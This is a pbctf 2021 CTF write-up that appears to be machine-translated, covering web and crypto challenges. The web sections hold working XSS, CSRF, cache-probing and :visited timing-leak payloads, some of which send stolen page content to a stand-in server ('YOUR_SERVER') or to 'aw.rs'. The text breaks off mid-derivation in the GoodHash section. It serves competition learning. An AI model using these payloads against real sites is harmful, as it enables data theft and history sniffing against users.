pbctf 2021 WriteUps

Category: CTF

This article is automatically translated by LLM, so the translation may be inaccurate or incomplete. If you find any mistake, please let me know.
You can find the original article here.

This time, I participated in pbctf 2021 as a solo player under the team name nyahello. I left only one crypto problem unsolved and solved two web problems; together with the easy misc problem, that put me in 15th place. As expected of problems written by the first-place team Perfect Blue, they were really challenging.

  Scoreboard Screenshot

Problems with a * in their titles indicate that I solved them after the competition.

Web

TBDXSS

from flask import Flask, request, session, jsonify, Response
import json
import redis
import random
import os
import time

app = Flask(__name__)
app.secret_key = os.environ.get("SECRET_KEY", "tops3cr3t")

app.config.update(
    SESSION_COOKIE_SECURE=True,
    SESSION_COOKIE_HTTPONLY=True,
    SESSION_COOKIE_SAMESITE='Lax',
)

HOST = os.environ.get("CHALL_HOST", "localhost:5000")

r = redis.Redis(host='redis')

@app.after_request
def add_XFrame(response):
    response.headers['X-Frame-Options'] = "DENY"
    return response


@app.route('/change_note', methods=['POST'])
def add():
    session['note'] = request.form['data']
    session.modified = True
    return "Changed succesfully"

@app.route("/do_report", methods=['POST'])
def do_report():
    cur_time = time.time()
    ip = request.headers.get('X-Forwarded-For').split(",")[-2].strip() #amazing google load balancer

    last_time = r.get('time.'+ip) 
    last_time = float(last_time) if last_time is not None else 0
    
    time_diff = cur_time - last_time

    if time_diff > 6:
        r.rpush('submissions', request.form['url'])
        r.setex('time.'+ip, 60, cur_time)
        return "submitted"

    return "rate limited"

@app.route('/note')
def notes():
    print(session)
    return """
<body>
{}
</body>
    """.format(session['note'])

@app.route("/report", methods=['GET'])
def report():
    return """
<head>
    <title>Notes app</title>
</head>
<body>
    <h3><a href="/note">Get Note</a>&nbsp;&nbsp;&nbsp;<a href="/">Change Note</a>&nbsp;&nbsp;&nbsp;<a href="/report">Report Link</a></h3>
        <hr>
        <h3>Please report suspicious URLs to admin</h3>
        <form action="/do_report" id="reportform" method=POST>
        URL: <input type="text" name="url" placeholder="URL">
        <br>
        <input type="submit" value="submit">
        </form>
    <br>
</body>
    """

@app.route('/')
def index():
    return """
<head>
    <title>Notes app</title>
</head>
<body>
    <h3><a href="/note">Get Note</a>&nbsp;&nbsp;&nbsp;<a href="/">Change Note</a>&nbsp;&nbsp;&nbsp;<a href="/report">Report Link</a></h3>
        <hr>
        <h3> Add a note </h3>
        <form action="/change_note" id="noteform" method=POST>
        <textarea rows="10" cols="100" name="data" form="noteform" placeholder="Note's content"></textarea>
        <br>
        <input type="submit" value="submit">
        </form>
    <br>
</body>
    """

The above is the core part of the code for this problem. The target XSS bot carries a session containing the flag when it visits, so the flag is displayed directly on /note. It is easy to get XSS by using CSRF to POST to /change_note, but doing so overwrites the note in the session that holds the flag, so the XSS alone is useless.

The idea for the solution came from the line response.headers['X-Frame-Options'] = "DENY", which blocks framing. It made me realize that, if framing were allowed, I could put two iframes on my own page: one loading the flag from /note and another triggering the XSS. The XSS frame could then read the content of the flag frame through top.frames, since both are same-origin.

Although this problem prohibits iframes, window.open has a similar effect. By opening a new tab with _blank, the returned object from window.open will be the window object of the new tab. The newly opened tab can also access the window of the original tab that called window.open using window.opener. This way, we can achieve the same result as described earlier.

Since we don't have frames to use this time, how can we get the appropriate window object? My approach was to open two tabs on one page: one for CSRF to XSS and another to delay and then open /note to trigger XSS. The original page would then redirect to /note. This way, you can find the window with the flag on the window.opener chain of the tab with XSS, and thus obtain the flag.

index.php:

Since the XSS bot stops waiting once the load event fires, we need to hold that event back, here with a slow-loading image. The real payload runs in the new tab, main.php.

<script>
open(location.href + 'main.php', '_blank')
</script>
<img src="https://deelay.me/20000/https://example.com">

main.php:

This is the main page, which opens two tabs and then redirects to the /note page with the flag.

<script>
open(location.href.replace('main', 'submit'), '_blank')
open(location.href.replace('main', 'opennote'), '_blank')
location.href = 'https://tbdxss.chal.perfect.blue/note'
</script>

submit.php:

A standard CSRF

<form action="https://tbdxss.chal.perfect.blue/change_note" method="POST" id=f>
<input name="data" value="peko">
</form>
<script>
f.data.value = '<script>const report = t => fetch("https://YOUR_SERVER/xss.php", {method: "POST", body: t}); report(window.opener.opener.document.body.textContent)</'+'script>'
f.submit()
</script>

opennote.php:

After a delay, it opens the /note page with XSS in a new tab. Since it's in a new tab, the XSS needs to use window.opener.opener to access the original main.php that redirected to /note.

<script>setTimeout(() => { open('https://tbdxss.chal.perfect.blue/note', '_blank') }, 1000)</script>

Flag: pbctf{g1t_m3_4_p4g3_r3f3r3nc3}

Vault

#!/usr/bin/env python3

import os
import socket


from flask import Flask
from flask import render_template
from flask import request

from flask_caching import Cache
from flask_recaptcha import ReCaptcha

app = Flask(__name__)
app.config["RECAPTCHA_SITE_KEY"] = os.environ["RECAPTCHA_SITE_KEY"]
app.config["RECAPTCHA_SECRET_KEY"] = os.environ["RECAPTCHA_SECRET_KEY"]
recaptcha = ReCaptcha(app)

cache = Cache(config={'CACHE_TYPE': 'FileSystemCache', 'CACHE_DIR':'/tmp/vault', 'CACHE_DEFAULT_TIMEOUT': 300})
cache.init_app(app)

@app.route("/<path:vault_key>", methods=["GET", "POST"])
def vault(vault_key):
    parts = list(filter(lambda s: s.isdigit(), vault_key.split("/")))
    level = len(parts)
    if level > 15:
        return "Too deep", 422

    if not cache.get("vault"):
        cache.set("vault", {})

    main_vault = cache.get("vault")

    c = main_vault
    for v in parts:
        c = c.setdefault(v, {})
    
    values = c.setdefault("values", [])

    if level > 8 and request.method == "POST":
         value = request.form.get("value")
         value = value[0:50]
         values.append(value)

    cache.set("vault", main_vault)
    return render_template("vault.html", values = values, level = level)

@app.route("/", methods=["GET", "POST"])
def main():
    if request.method == "GET":
        return render_template("main.html")
    else:
        if recaptcha.verify():
            url = request.form.get("url")
            if not url:
                return "The url parameter is required", 422
            if not url.startswith("https://") and not url.startswith("http://"):
                return "The url parameter is invalid", 422


            s = socket.create_connection(("bot", 8000))
            s.sendall(url.encode())
            resp = s.recv(100)
            s.close()

            return resp.decode(), 200
        else:
            return "Invalid captcha", 422

The above is the core part of the code for this problem. Paths of the form /12/24/8/31/.../ let you store values on the page (only at depths greater than 8), and there is no XSS. The bot first opens the site (http://vault.chal.perfect.blue/), clicks random links until it is fourteen levels deep, submits the flag on that page, and then visits a URL of your choice:

async function click_vault(page, i) {
  const vault = `a.vault-${i}`;
  const elem = await page.waitForSelector(vault, { visible: true });
  await Promise.all([page.waitForNavigation(), elem.click()]);
}

async function add_flag_to_vault(browser, url) {
  if (!url || url.indexOf("http") !== 0) {
    return;
  }
  const page = await browser.newPage();

  try {
    await page.goto(vaultUrl);

    for (let i = 0; i < 14; i++) {
      await click_vault(page, crypto.randomInt(1, 33));
    }
    await page.type("#value", FLAG);
    await Promise.all([page.waitForNavigation(), page.click("#submit")]);

    await page.goto(url);
    await new Promise((resolve) => setTimeout(resolve, 30 * 1000));
  } catch (e) {
    console.log(e);
  }
  await page.close();
}

The goal of this problem is to find a way to obtain the URL of the page the bot was on before browsing your page, and then you can get the flag. The method is obviously related to XS-Leaks and Cache Probing, which uses the browser's cache to check if a URL has been visited. The simplest method is to use await fetch(url, { 'cache': 'force-cache' }) and measure the time it takes to determine if it has been cached.

If you test this from your own page, it doesn't work, but it does work from pages under the chal.perfect.blue domain. This is because modern browsers partition the HTTP cache by the site of the top-level page (Cache Partitioning), which prevents this kind of cross-site cache probing.

My approach was to use the fact that the domain for TBDXSS is tbdxss.chal.perfect.blue, which shares the same cache as vault.chal.perfect.blue. Testing with fetch also yielded the expected results, so using XSS on TBDXSS for Cache Probing should work.

However, a difficulty arises because TBDXSS's cookies are secure due to SESSION_COOKIE_SECURE=True, meaning they only work under https. But the bot's cache is under http://vault.chal.perfect.blue/. Accessing http from an https page will be blocked by the browser, resulting in a Mixed Content warning.

I noticed that if you set document.cookie = 'session=xxxx; path=/note' on an https page and then visit http://tbdxss.chal.perfect.blue/note, the cookie is still sent, achieving our goal. The value of xxxx can be easily obtained by POSTing your payload to the TBDXSS server.

index.html:

Opens two pages: one for CSRF to submit the XSS payload to TBDXSS, and another to delay and then open TBDXSS's /note page to trigger XSS.

<body>
    <script>
        open(location.href + 'submit.php', '_blank')
        open(location.href + 'opennote.php', '_blank')
    </script>
</body>

opennote.php:

Same as the previous problem

<script>setTimeout(() => { open('https://tbdxss.chal.perfect.blue/note', '_blank') }, 1000)</script>

submit.php:

Reads the file from xss.js, POSTs it to get the corresponding session cookie, generates an XSS payload to set document.cookie, then redirects to the http version of the page to execute the real second-stage XSS in xss.js.

<?php
$xss = file_get_contents('xss.js');
$payload = '<script>'.$xss.'</script>';
$ch = curl_init('https://tbdxss.chal.perfect.blue/change_note');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'data' => $payload
]));
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);


function onHeader( $curl, $header_line ) {
    global $sess;
    if(strpos($header_line, 'session=') !== false){
        $sess = explode(';', explode('session=', $header_line)[1])[0];
    }
    return strlen($header_line);
}

curl_setopt($ch, CURLOPT_HEADERFUNCTION, "onHeader");
$response = curl_exec($ch);

$js = 'document.cookie = "session=" + '.json_encode($sess).'+ "; path=/note"; location.href = "http://tbdxss.chal.perfect.blue/note";';
?>
<form action="https://tbdxss.chal.perfect.blue/change_note" method="POST" id=f>
<textarea name="data"></textarea>
</form>
<script>
f.data.value = "SET COOKIE<script>" + <?= json_encode($js) ?> + "</" + "script>"
f.submit()
</script>
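
The only non-obvious step in submit.php is pulling the session value out of the Set-Cookie response header. As a rough Python rendering of the onHeader callback (the function name extract_session and the sample header value are made up for illustration, not taken from the challenge):

```python
def extract_session(header_line: str):
    """Return the value of the `session` cookie in one raw header line, or None."""
    if "session=" not in header_line:
        return None
    # Same split logic as the PHP: take what follows "session=" up to the next ";".
    return header_line.split("session=", 1)[1].split(";", 1)[0].strip()


# Hypothetical header line, shaped like what Flask sends back.
sample = "Set-Cookie: session=eyJub3RlIjoiYWJjIn0.YWJj.sig; Secure; HttpOnly; Path=/; SameSite=Lax"
print(extract_session(sample))
```

The returned string is what gets embedded in the first-stage payload as the session=... value.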

xss.js:

This part is the real Cache Probing code. I found that fetching a cached page takes less than 5 ms, so the path can be brute-forced recursively, one segment at a time.

const report = s => fetch(location.protocol + '//YOUR_SERVER/report.php', { method: 'POST', body: s })
const getLoadTime = async url => {
	const start = performance.now()
	await fetch(url, { cache: 'force-cache', mode: 'no-cors' })
	return performance.now() - start
}
const buildUrl = parts => location.protocol + '//vault.chal.perfect.blue/' + parts.join('/') + '/'
window.onload = async () => {
	try {
		for (let i = 0; i < 5; i++) {
			// warmup
			await getLoadTime(location.protocol + '//vault.chal.perfect.blue/')
		}
		const brute = async parts => {
			for (let i = 1; i <= 32; i++) {
				const t = await getLoadTime(buildUrl(parts.concat([i])))
				if (t < 5) {
					const nextParts = parts.concat([i])
					report(buildUrl(nextParts))
					return brute(nextParts)
				}
			}
		}
		await brute([])
	} catch (e) {
		report(e.toString())
	}
}
report('sancheck: ' + location.href)

Finally, for some unknown reason, this only recovers 14-1=13 levels of the path. The last level is easy to brute-force with a short Python script:

import requests

url = "http://vault.chal.perfect.blue/11/30/24/5/30/3/4/2/30/7/16/32/9/"

for i in range(1, 33):
    r = requests.get(f"{url}{i}/")
    if "pbctf" in r.text:
        print(f"{url}{i}/", r.text)

# http://vault.chal.perfect.blue/11/30/24/5/30/3/4/2/30/7/16/32/9/26/
# pbctf{who_knew_that_history_was_not_so_private}

The URL in this script may no longer work: more instances were added later, so the flag may live on a different instance.

Intended Solution

However, my approach seems to be unintended. The intended solution is to use :visited to leak whether a link has been visited.

The author's solution is as follows:

<!DOCTYPE html>
<html>

<!--
Visited links are known to be leaky, see

https://bugs.chromium.org/p/chromium/issues/detail?id=713521
https://bugs.chromium.org/p/chromium/issues/detail?id=1247907

Can use requestAnimationFrame and requestIdleCallback to reliably check when a links :visited status changes

--> 
<head>
    <style>
        #link {
            position: absolute;
            top: 0;
            opacity: 0.001;
            pointer-events: none;
        }

        a {
            display: block;
        }

        .container {
            display: grid;
            grid-template-columns: 1fr 1fr;
        }

        .links {
            width: 30vw;
        }
    </style>
</head>

<body>
    <a id="link" href=""></a>

    <div class="container">
        <div class="links">
            <h2>Visited links</h2>
            <hr>
            <div id="seen"></div>
        </div>
        <div class="links">
            <h2>Unvisted links</h2>
            <hr>
            <div id="unseen"></div>
        </div>
    </div>

    <script>
        // const VAULT_URL = "http://localhost:5000/";
        const VAULT_URL = "http://web:5000/";

        const link = document.getElementById("link");
        const seen = document.getElementById("seen");
        const unseen = document.getElementById("unseen");

        async function getLinkTime(url) {
            let t1, t2 = 0;
            await new Promise((resolve) => {
                requestAnimationFrame(() => {
                    t1 = performance.now();
                    link.href = url;
                    requestIdleCallback(() => {
                        t2 = performance.now()
                        resolve();
                    }, { timeout: 1000 });
                });
            });
            return t2 - t1;
        }

        async function hasLinkBeenVisited(url) {
            await getLinkTime("");
            const urlTime = await getLinkTime(url);
            const urlTimeUnvisited = await getLinkTime(url + "?" + performance.now())
            return urlTimeUnvisited > urlTime;
        }

        async function checkUrl(url) {
            const a = document.createElement("a");
            a.href = url;
            a.innerText = url;

            if (await hasLinkBeenVisited(url)) {
                seen.prepend(a);
                return true;
            } else {
                unseen.prepend(a);
                return false;
            }
        }

        async function setup() {
            link.innerText = "aa ".repeat(0x10000);

            let base = VAULT_URL;

            while (true) {
                let found = false;
                const urls = [];
                for (let i = 0; i < 33; i++) {
                    urls.push(`${base}${i}/`)
                }
                urls.push("http://adsfadsfadf.com");
                for (const url of urls) {
                    if (await checkUrl(url)) {
                        base = url;
                        found = true;
                        break;
                    }
                }
                if (!found) {
                    break;
                }
            }

            await fetch("http://aw.rs?" + base)
        }
        setup()
    </script>
</body>

</html>

Browsers display links with different colors depending on whether they have been visited. For example, in Chromium, the default colors are blue for unvisited and purple for visited. Theoretically, if you can obtain the color, you can determine if a person has visited a URL, and getComputedStyle indeed allows you to access an element's color.

However, as mentioned in its documentation, for privacy reasons, it won't let you distinguish the color after :visited, so it always returns the color for unvisited links.

The author's solution uses an absolutely positioned, nearly transparent a#link element, and first fills it with a large amount of text ("aa ".repeat(0x10000)).

If you change the href, the browser will update the :visited status. If the color changes, it means re-rendering is required. Since there is a large amount of text, it takes more time to re-render. By measuring the time the browser takes to re-render, you can leak some information.

In my tests on Chrome 94, the time difference between an unvisited and a visited link is about 0.1 ms vs. 3~5 ms.

getLinkTime first uses requestAnimationFrame, which is called before the browser repaints. It records the time t1 and updates the href in the callback, then registers another callback with requestIdleCallback. When the second callback is called, it resolves performance.now() - t1, representing the time the browser took to handle the href update.

It may include some additional processing time, but it can be ignored as a minor error.

hasLinkBeenVisited first calls getLinkTime("") to set the href to an empty string and waits for it to render completely. An empty href resolves to the current page, which has been visited, so this ensures the link starts out purple (the :visited color). It then measures urlTime for the target URL, followed by urlTimeUnvisited for a URL with a unique query string that cannot have been visited.

If the URL is :visited, the color change will be purple->purple->blue; otherwise, it will be purple->blue->blue. We know the time required for a color change is much greater than the time required for no change, so if urlTime < urlTimeUnvisited, it means the URL is :visited.

Using this time difference, you can brute-force the target path and get the flag.

I also tried this experiment on Firefox. The first difficulty is that Firefox's default performance.now() precision is only at the millisecond level, making it hard to get accurate times. The other is that, for some unknown reason, getLinkTime on Firefox doesn't measure the time needed to change the href as accurately as it does on Chromium. After adding some extra code, I could recover the first segment of the path with high probability, but it failed from the second segment onward.

Crypto

Alkaloid Stream

#!/usr/bin/env python3

import random
from flag import flag

def keygen(ln):
    # Generate a linearly independent key
    arr = [ 1 << i for i in range(ln) ]

    for i in range(ln):
        for j in range(i):
            if random.getrandbits(1):
                arr[j] ^= arr[i]
    for i in range(ln):
        for j in range(i):
            if random.getrandbits(1):
                arr[ln - 1 - j] ^= arr[ln - 1 - i]

    return arr

def gen_keystream(key):
    ln = len(key)
    
    # Generate some fake values based on the given key...
    fake = [0] * ln
    for i in range(ln):
        for j in range(ln // 3):
            if i + j + 1 >= ln:
                break
            fake[i] ^= key[i + j + 1]

    # Generate the keystream
    res = []
    for i in range(ln):
        t = random.getrandbits(1)
        if t:
            res.append((t, [fake[i], key[i]]))
        else:
            res.append((t, [key[i], fake[i]]))

    # Shuffle!
    random.shuffle(res)

    keystream = [v[0] for v in res]
    public = [v[1] for v in res]
    return keystream, public

def xor(a, b):
    return [x ^ y for x, y in zip(a, b)]

def recover_keystream(key, public):
    st = set(key)
    keystream = []
    for v0, v1 in public:
        if v0 in st:
            keystream.append(0)
        elif v1 in st:
            keystream.append(1)
        else:
            assert False, "Failed to recover the keystream"
    return keystream

def bytes_to_bits(inp):
    res = []
    for v in inp:
        res.extend(list(map(int, format(v, '08b'))))
    return res

def bits_to_bytes(inp):
    res = []
    for i in range(0, len(inp), 8):
        res.append(int(''.join(map(str, inp[i:i+8])), 2))
    return bytes(res)

flag = bytes_to_bits(flag)

key = keygen(len(flag))
keystream, public = gen_keystream(key)
assert keystream == recover_keystream(key, public)
enc = bits_to_bytes(xor(flag, keystream))

print(enc.hex())
print(public)

You can see it first converts the flag into bits, then generates a linearly independent key of the same length. It then uses the key to generate some fake values, randomly generates a keystream, and encrypts the flag with XOR. The public is generated by swapping the order of key and fake based on each bit of the keystream, so to recover the keystream, we need to find a way to distinguish between key and fake without knowing the key.

Let's first replace the key with the basic values 1,2,4,...,512 to observe:

['0000000001', '0000000010', '0000000100', '0000001000', '0000010000', '0000100000', '0001000000', '0010000000', '0100000000', '1000000000']
['0000001110', '0000011100', '0000111000', '0001110000', '0011100000', '0111000000', '1110000000', '1100000000', '1000000000', '0000000000']

The first list is the binary representation of the key, and the second is the corresponding fake. We can observe that each fake[i] is the XOR of the next k key values after key[i] (where k = len(key) // 3). If fewer than k key values remain, only the remaining ones are used, so fake[-1] == 0 always holds.
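
The two lists can be reproduced with a few lines of Python. This is only a sketch of the fake-generation loop from the challenge, rewritten with a slice; make_fake is a name introduced here for illustration:

```python
from functools import reduce
from operator import xor


def make_fake(key):
    # fake[i] is the XOR of up to k key values that follow key[i].
    k = len(key) // 3
    return [reduce(xor, key[i + 1 : i + 1 + k], 0) for i in range(len(key))]


key = [1 << i for i in range(10)]  # the "basic" key 1, 2, 4, ..., 512
fake = make_fake(key)
print([format(v, "010b") for v in key])
print([format(v, "010b") for v in fake])
```

With a key of length 10, k is 3, so the slice runs short for the last three entries and the final one is empty.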

Since we know from the key generation method that the key will not contain 0, any 0 must be a fake, allowing us to determine one key value. With one key value, we can use a similar method to find another fake value, then recover the second key, and so on, until we recover all the key values.

import ast
from functools import reduce
from operator import xor

with open("output.txt") as f:
    ct = bytes.fromhex(f.readline().strip())
    public = ast.literal_eval(f.readline().strip())

window = len(public) // 3
print(window)
PT = list(zip(*public))  # transpose
rkey = []

fakei = -1
xk = 0  # the last element of fake is always 0

while len(rkey) != len(public):
    if xk in PT[0] and PT[0].index(xk) != fakei:
        ROW = False
    else:
        ROW = True
    fakei = PT[ROW].index(xk)
    k = PT[not ROW][fakei]
    rkey.append(k)
    print(fakei)
    xk = reduce(xor, rkey[-window:])

key = rkey[::-1]


def recover_keystream(key, public):
    st = set(key)
    keystream = []
    for v0, v1 in public:
        if v0 in st:
            keystream.append(0)
        elif v1 in st:
            keystream.append(1)
        else:
            assert False, "Failed to recover the keystream"
    return keystream


def bits_to_bytes(inp):
    res = []
    for i in range(0, len(inp), 8):
        res.append(int("".join(map(str, inp[i : i + 8])), 2))
    return bytes(res)


ks = recover_keystream(key, public)
print(bytes(a ^ b for a, b in zip(ct, bits_to_bytes(ks))))

# pbctf{super_duper_easy_brute_forcing_actually_this_one_was_made_by_mistake}

The k mentioned earlier is called window in this code.
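
To sanity-check the recovery idea without the challenge's output.txt, one can run a toy round trip: generate a key and public list the same way the challenge does, then peel off key values starting from the fake that equals 0. This is a sketch written for this purpose, not the script above; it tracks unused positions explicitly instead of searching each row by index, and the seed and key length are arbitrary.

```python
import random
from functools import reduce
from operator import xor


def keygen(ln, rng):
    # Same construction as the challenge: row operations on the identity basis.
    arr = [1 << i for i in range(ln)]
    for i in range(ln):
        for j in range(i):
            if rng.getrandbits(1):
                arr[j] ^= arr[i]
    for i in range(ln):
        for j in range(i):
            if rng.getrandbits(1):
                arr[ln - 1 - j] ^= arr[ln - 1 - i]
    return arr


def gen_keystream(key, rng):
    ln, k = len(key), len(key) // 3
    fake = [reduce(xor, key[i + 1 : i + 1 + k], 0) for i in range(ln)]
    res = []
    for kv, fv in zip(key, fake):
        t = rng.getrandbits(1)
        res.append((t, [fv, kv] if t else [kv, fv]))
    rng.shuffle(res)
    return [t for t, _ in res], [pair for _, pair in res]


def recover_keystream(public):
    ln, k = len(public), len(public) // 3
    unused = set(range(ln))
    rkey = []            # key values, recovered from the last index backwards
    bits = [None] * ln
    target = 0           # the last fake is always 0
    while unused:
        pos = next(p for p in unused if target in public[p])
        unused.remove(pos)
        fake_side = public[pos].index(target)
        rkey.append(public[pos][1 - fake_side])
        bits[pos] = 1 - fake_side  # keystream bit = which slot holds the key
        target = reduce(xor, rkey[-k:])  # the next fake to look for
    return bits


rng = random.Random(2021)
key = keygen(48, rng)
keystream, public = gen_keystream(key, rng)
print(recover_keystream(public) == keystream)
```

Only unused positions are searched because the most recently recovered key value can reappear as the next fake, so a plain search over all pairs could pick the wrong entry.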

Steroid Stream

#!/usr/bin/env python3

import random
from flag import flag

def keygen(ln):
    # Generate a linearly independent key
    arr = [ 1 << i for i in range(ln) ]

    for i in range(ln):
        for j in range(i):
            if random.getrandbits(1):
                arr[j] ^= arr[i]
    for i in range(ln):
        for j in range(i):
            if random.getrandbits(1):
                arr[ln - 1 - j] ^= arr[ln - 1 - i]

    return arr

def gen_keystream(key):
    ln = len(key)
    assert ln > 50
    
    # Generate some fake values based on the given key...
    fake = [0] * ln
    for i in range(ln - ln // 3):
        arr = list(range(i + 1, ln))
        random.shuffle(arr)
        for j in arr[:ln // 3]:
            fake[i] ^= key[j]

    # Generate the keystream
    res = []
    for i in range(ln):
        t = random.getrandbits(1)
        if t:
            res.append((t, [fake[i], key[i]]))
        else:
            res.append((t, [key[i], fake[i]]))

    # Shuffle!
    random.shuffle(res)

    keystream = [v[0] for v in res]
    public = [v[1] for v in res]
    return keystream, public

def xor(a, b):
    return [x ^ y for x, y in zip(a, b)]

def recover_keystream(key, public):
    st = set(key)
    keystream = []
    for v0, v1 in public:
        if v0 in st:
            keystream.append(0)
        elif v1 in st:
            keystream.append(1)
        else:
            assert False, "Failed to recover the keystream"
    return keystream

def bytes_to_bits(inp):
    res = []
    for v in inp:
        res.extend(list(map(int, format(v, '08b'))))
    return res

def bits_to_bytes(inp):
    res = []
    for i in range(0, len(inp), 8):
        res.append(int(''.join(map(str, inp[i:i+8])), 2))
    return bytes(res)

flag = bytes_to_bits(flag)

key = keygen(len(flag))
keystream, public = gen_keystream(key)
assert keystream == recover_keystream(key, public)
enc = bits_to_bytes(xor(flag, keystream))

print(enc.hex())
print(public)

This problem is similar to the previous one, but the generation of fake values has been changed. The last k fake values are fixed to 0 (k = len(key) // 3), and each of the remaining fake values is the XOR of k randomly chosen key values at later indices.

XOR can be represented as addition in $\mathbb{F}_2$, and XOR on multi-bit values is just vector addition in $\mathbb{F}_2^n$ (where n = len(public)).

First, using the fact that k fake values are 0, we can obtain one-third of the key. According to the fake generation method, at least one of the remaining unknown fake values is a linear combination of the known key values. This can be solved using Sage's solve_left to check if the number of 1s in the solution vector matches k.
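
The span test does not strictly need Sage. As an illustration only (this is neither the script below nor the intended solution), the same check can be sketched in plain Python with an XOR basis over integers that also remembers which inserted vectors make up each combination. The class name XorBasis and its methods are hypothetical.

```python
class XorBasis:
    """Linear basis over GF(2) for Python ints, tracking combinations."""

    def __init__(self):
        self.rows = {}   # pivot bit -> (reduced value, mask of inserted vectors)
        self.count = 0   # number of independent vectors inserted so far

    def _reduce(self, v):
        combo = 0
        while v:
            pivot = v.bit_length() - 1
            if pivot not in self.rows:
                break
            row_value, row_combo = self.rows[pivot]
            v ^= row_value
            combo ^= row_combo
        return v, combo

    def add(self, v):
        """Insert v; return False if it was already in the span."""
        r, combo = self._reduce(v)
        if r == 0:
            return False
        self.rows[r.bit_length() - 1] = (r, combo ^ (1 << self.count))
        self.count += 1
        return True

    def solve(self, t):
        """Return a bitmask of inserted vectors that XOR to t, or None."""
        r, combo = self._reduce(t)
        return combo if r == 0 else None


basis = XorBasis()
for kv in (0b0011, 0b0101, 0b1000):  # toy "known key values"
    basis.add(kv)

mask = basis.solve(0b0110)           # 0b0011 ^ 0b0101
print(mask, bin(mask).count("1"))    # number of key values used
print(basis.solve(0b0100))           # not in the span
```

Because the key values are linearly independent, the combination is unique, so counting the 1 bits in the mask plays the same role as summing Sage's solution vector and comparing it with k.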

Using this method, we can implement the solution. However, it takes a lot of time to run. On my computer, it took about an hour to find the solution:

import ast
from sage.all import GF, vector, matrix, ZZ
from tqdm import tqdm

with open("output.txt") as f:
    ct = bytes.fromhex(f.readline().strip())
    public = ast.literal_eval(f.readline().strip())

window = len(public) // 3
print(window)
PT = list(zip(*public))  # transpose
l = len(public)


def findpt(cond):
    for i in range(l):
        if cond(PT[0][i]):
            yield 0, i
        elif cond(PT[1][i]):
            yield 1, i


def bink(x, k):
    return bin(x)[2:].rjust(k, "0")


F = GF(2)


def int2vec(x, bits=len(public)):
    v = vector(F, map(int, bink(x, bits)))
    v.set_immutable()
    return v


def vec2int(v):
    return int("".join(map(str, v)), 2)


def is_in_span(M, t, k):
    try:
        r = M.solve_left(t)
        return sum(r.change_ring(ZZ)) == k
    except ValueError:
        return False


rkey = set()
for r, i in findpt(lambda x: x == 0):
    rkey.add(int2vec(PT[not r][i]))

pbar = tqdm(total=len(public))
pbar.n = len(rkey)
pbar.refresh()
while len(rkey) != len(public):
    M = matrix(rkey)

    def check(x):
        return is_in_span(M, int2vec(x), window)

    for r, i in findpt(check):
        rkey.add(int2vec(PT[not r][i]))
    pbar.n = len(rkey)
    pbar.refresh()
    print(len(rkey))

rkey = set(vec2int(v) for v in rkey)

key = list(rkey)


def recover_keystream(key, public):
    st = set(key)
    keystream = []
    for v0, v1 in public:
        if v0 in st:
            keystream.append(0)
        elif v1 in st:
            keystream.append(1)
        else:
            assert False, "Failed to recover the keystream"
    return keystream


def bits_to_bytes(inp):
    res = []
    for i in range(0, len(inp), 8):
        res.append(int("".join(map(str, inp[i : i + 8])), 2))
    return bytes(res)


ks = recover_keystream(key, public)
print(bytes(a ^ b for a, b in zip(ct, bits_to_bytes(ks))))

# takes ~1hr to run...
# pbctf{I_hope_you_enjoyed_this_challenge_now_how_about_playing_Metroid_Dread?}

However, the intended solution's algorithm seems to be much better and faster. It is related to this, but I don't understand it :(

GoodHash

#!/usr/bin/env python3

from Crypto.Cipher import AES
from Crypto.Util.number import *
from flag import flag
import json
import os
import string

ACCEPTABLE = string.ascii_letters + string.digits + string.punctuation + " "


class GoodHash:
    def __init__(self, v=b""):
        self.key = b"goodhashGOODHASH"
        self.buf = v

    def update(self, v):
        self.buf += v

    def digest(self):
        cipher = AES.new(self.key, AES.MODE_GCM, nonce=self.buf)
        enc, tag = cipher.encrypt_and_digest(b"\0" * 32)
        return enc + tag

    def hexdigest(self):
        return self.digest().hex()


if __name__ == "__main__":
    token = json.dumps({"token": os.urandom(16).hex(), "admin": False})
    token_hash = GoodHash(token.encode()).hexdigest()
    print(f"Body: {token}")
    print(f"Hash: {token_hash}")

    inp = input("> ")
    if len(inp) > 64 or any(v not in ACCEPTABLE for v in inp):
        print("Invalid input :(")
        exit(0)

    inp_hash = GoodHash(inp.encode()).hexdigest()

    if token_hash == inp_hash:
        try:
            token = json.loads(inp)
            if token["admin"] == True:
                print("Wow, how did you find a collision?")
                print(f"Here's the flag: {flag}")
            else:
                print("Nice try.")
                print("Now you need to set the admin value to True")
        except:
            print("Invalid input :(")
    else:
        print("Invalid input :(")

This problem prints a JSON token containing a random value and "admin": false, together with its hash under a custom GoodHash function. You need to provide another JSON string with the same hash that has admin set to true after parsing.

The GoodHash function is simple. It uses the hash data as the nonce for AES-GCM, with a fixed known key, and the output after encrypting two blocks of all zeros is the hash output.

In pycryptodome's GCM implementation, you can see this:

# Step 2 - Compute J0
if len(self.nonce) == 12:
    j0 = self.nonce + b"\x00\x00\x00\x01"
else:
    fill = (16 - (len(nonce) % 16)) % 16 + 8
    ghash_in = (self.nonce +
                b'\x00' * fill +
                long_to_bytes(8 * len(nonce), 8))

    j0 = _GHASH(hash_subkey, ghash_c).update(ghash_in).digest()

# Step 3 - Prepare GCTR cipher for encryption/decryption
nonce_ctr = j0[:12]
iv_ctr = (bytes_to_long(j0) + 1) & 0xFFFFFFFF

Here, j0 is the actual IV used as the GCM counter, so as long as two nonces produce the same j0, the entire GoodHash will collide, making the goal to find a collision for the GHASH function.

pycryptodome's GCM implementation is based on this document. In section 6.4, there is pseudocode for the GHASH function. This function can be expressed simply using $\mathbb{GF}(2^{128})$ arithmetic:

$$\operatorname{GHASH}(H,X)=\sum_{i=1}^{n} X_i H^{n+1-i}$$

Here $H$ is a fixed value corresponding to the hash_subkey, and $X$ is the sequence of input blocks, i.e., ghash_in, which is the padded nonce. The hash_subkey is obtained by encrypting a block of zeros with AES-ECB using the same key.

To find a simple collision, assume we have a fixed message $X_1 \| X_2$ with hash $T$, and we want to find $X_1' \| X_2'$ with the same hash:

$$\begin{aligned} X_1 H^2 + X_2 H &= T \\ X_1' H^2 + X_2' H &= T \end{aligned}$$

So $(X_1 - X_1')H^2+(X_2 - X_2')H=0$. Setting $X_1'=X_1+1$ and $X_2'=X_2+H$ gives one such collision: addition and subtraction coincide in characteristic 2, so the left-hand side becomes $H^2 + H \cdot H = 0$.
